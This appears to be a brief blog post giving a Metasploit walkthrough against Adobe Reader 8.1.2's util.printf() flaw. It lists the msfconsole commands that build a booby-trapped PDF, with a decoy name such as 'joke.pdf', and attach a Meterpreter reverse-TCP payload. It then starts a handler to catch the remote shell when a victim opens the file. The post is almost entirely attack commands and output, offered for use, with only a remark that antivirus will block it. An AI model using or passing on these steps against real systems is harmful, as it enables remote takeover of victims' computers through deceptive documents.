control – metasploit adobe util.printf() client-side exploit

Metasploit adobe util.printf() client-side exploit

works against Adobe Reader v8.1.2

sudo msfconsole

use exploit/windows/fileformat/adobe_utilprintf

set FILENAME joke.pdf

set payload windows/meterpreter/reverse_tcp

set lhost

show options


[*] Creating ‘bufferoverflow.pdf’ file…
[+] bufferoverflow.pdf stored at /home/.msf4/local/bufferoverflow.pdf

Then open another window

sudo msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost= e

Wait for client to open the pdf

Any AV will highlight this and block it.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s